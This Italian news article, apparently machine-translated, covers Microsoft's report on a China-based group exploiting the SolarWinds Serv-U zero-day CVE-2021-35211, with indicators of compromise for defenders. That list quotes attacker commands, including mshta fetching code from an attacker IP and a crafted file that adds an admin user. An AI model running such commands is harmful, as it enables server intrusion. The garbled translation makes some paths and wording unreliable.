Gli attacchi zero-day di SolarWinds offrono agli hacker cinesi un accesso privilegiato ai server dei clienti

Microsoft ha dichiarato martedì che un hacker che opera in Cina ha sfruttato una vulnerabilità zero-day nei prodotti SolarWinds. Secondo Microsoft, gli hacker stavano probabilmente prendendo di mira le società di software e l’industria della difesa statunitense.

SolarWinds rivela Zero Day lunedì Dopo aver ricevuto una notifica da Microsoft che ha scoperto che una vulnerabilità precedentemente sconosciuta nella linea di prodotti SolarWinds Serv-U veniva attivamente sfruttata, SolarWinds, con sede ad Austin, in Texas, ha attaccato. Non fornisce dettagli sugli attori delle minacce dietro o su come ha funzionato l’attacco.

VPN commerciale e router consumer compromesso

Martedì, Microsoft ha dichiarato di aver designato il gruppo di hacking come “DEV-0322” per ora. “DEV” si riferisce a un “gruppo di sviluppo” su cui i ricercatori Microsoft stanno indagando prima di acquisire grande fiducia nell’origine o nell’identità dell’attore dietro l’operazione. Secondo l’azienda, gli aggressori si trovano spesso fisicamente in Cina e si affidano a botnet costituite da router e altri tipi di dispositivi IoT.

“MSTIC ha osservato il DEV-0322 che prende di mira il settore di base dell’industria della difesa statunitense e le entità delle società di software”, ha scritto un ricercatore del Microsoft Threat Intelligence Center. Posizione.. “Questo gruppo di attività ha sede in Cina ed è stato identificato come utilizzo di soluzioni VPN commerciali e router consumer compromessi nell’infrastruttura dell’attaccante”.

Oltre ai tre server correlati agli aggressori già divulgati da SolarWinds, Microsoft ha fornito tre indicatori aggiuntivi che possono essere utilizzati per determinare se si è verificato un hack. Le tracce di intrusione sono:

98[.]176[.]196[.]89 68[.]235[.]178[.]32 208[.]113[.]35[.]58 144[.]34[.]179[.]162 97[.]77[.]97[.]58 hxxp: // 144[.]34[.]179[.]162 / a C: Windows Temp Serv-U.bat C: Windows Temp test current.dmp Si è verificato un errore di eccezione sospetta soprattutto nel file di registro DebugSocketlog.txt C: Windows System32 mshta.exe http: // 144[.]34[.]179[.]162 / a (difesa) cmd.exe / c whoami> ?/Client/Common/redacted.txt滭/li> cmd.exe / c dir> ? Client Common redacted.txt滭/li> cmd.exe / c 淐: Windows Temp Serv-U.bat滭/li> powershell.exe C: Windows Temp Serv-U.bat cmd.exe / c type redacted redacted.Archive>淐: ProgramData Utenti RhinoSoft Serv-U Utenti globali redatti.Archive滭/li>

Il post di martedì ha anche fornito nuovi dettagli tecnici sull’attacco. In particolare:

DEV-0322 ha verificato che reindirizza l’output del comando cmd.exe a un file nella cartella Serv-U Client Common in modo che un utente malintenzionato possa ottenere il risultato del comando. È accessibile da Internet per impostazione predefinita. Gli attori hanno anche scoperto che creando manualmente un file .Archive appositamente predisposto nella directory degli utenti globali, aggiungono nuovi utenti globali a Serv-U e li aggiungono efficacemente come amministratori di Serv-U. .. Le informazioni sull’utente Serv-U sono memorizzate in questi file .Archive.

Se l’exploit compromette correttamente il processo Serv-U, poiché DEV-0322 ha scritto il codice, verrà generata un’eccezione e registrata nel file di registro Serv-U DebugSocketLog.txt. I processi possono ancora arrestarsi in modo anomalo dopo l’esecuzione di un comando dannoso.

Osservando la telemetria, abbiamo identificato la funzionalità dell’exploit, ma non la vulnerabilità sottostante. MSTIC ha collaborato con il team di Microsoft Offensive Security Research per eseguire un’indagine sulla vulnerabilità del binario Serv-U e identificare la vulnerabilità attraverso l’analisi della scatola nera. Una volta trovata la causa principale, abbiamo segnalato la vulnerabilità a SolarWinds. SolarWinds ha risposto rapidamente per comprendere il problema e creare la patch.

Una vulnerabilità zero-day rilevata come CVE-2021-35211 esiste nei prodotti Serv-U di SolarWinds che i clienti utilizzano per trasferire file attraverso le reti. Quando Serv-U SSH è esposto a Internet, gli exploit consentono agli aggressori di eseguire in remoto codice dannoso con privilegi di sistema elevati. Da lì, un utente malintenzionato può installare ed eseguire un payload dannoso o visualizzare e modificare i dati.

SolarWinds è diventato un nome popolare durante la notte alla fine di dicembre e i ricercatori hanno trovato SolarWinds al centro di un attacco alla catena di approvvigionamento globale. Gli aggressori utilizzano l’accesso per effettuare aggiornamenti dannosi dopo aver messo in pericolo il sistema di creazione del software di SolarWinds Circa 18.000 clienti Dello strumento di gestione della rete Orion dell’azienda

Di questi 18.000 clienti, circa 9 di agenzie governative statunitensi e circa 100 di società private hanno ricevuto malware successivo. Il governo federale ha attribuito l’attacco al Foreign Intelligence Service russo (abbreviato in SVR). Per oltre un decennio, SVR ha condotto campagne di malware rivolte a governi, gruppi di riflessione politici e altre organizzazioni in tutto il mondo.

Gli attacchi zero-day scoperti e segnalati da Microsoft non hanno nulla a che fare con gli attacchi alla catena di approvvigionamento di Orion.

SolarWinds ha corretto questa vulnerabilità durante il fine settimana. Chiunque esegua una versione vulnerabile di Serv-U dovrebbe aggiornare immediatamente per vedere se ci sono segni di compromissione.

Kontron utilizza Codesys per portare Raspberry Pi nell’industria 4.0 Samsung Galaxy Z Flip 3 5G Bespoke Edition consente agli utenti di personalizzare i propri dispositivi in ​​nuovi modi 6 strategie per far crescere la propria attività MSP | Gestisci la tua attività Usa questo manager all-in-one per trasferire tutti i tuoi dati sul tuo nuovo iPhone 13 I 10 migliori lavori per il coniuge militare Ultime notizie sulla tecnologia

Kontron utilizza Codesys per portare Raspberry Pi nell’industria 4.0 Samsung Galaxy Z Flip 3 5G Bespoke Edition consente agli utenti di personalizzare i propri dispositivi in ​​nuovi modi 6 strategie per far crescere la propria attività MSP | Gestisci la tua attività Usa questo manager all-in-one per trasferire tutti i tuoi dati sul tuo nuovo iPhone 13 I 10 migliori lavori per il coniuge militare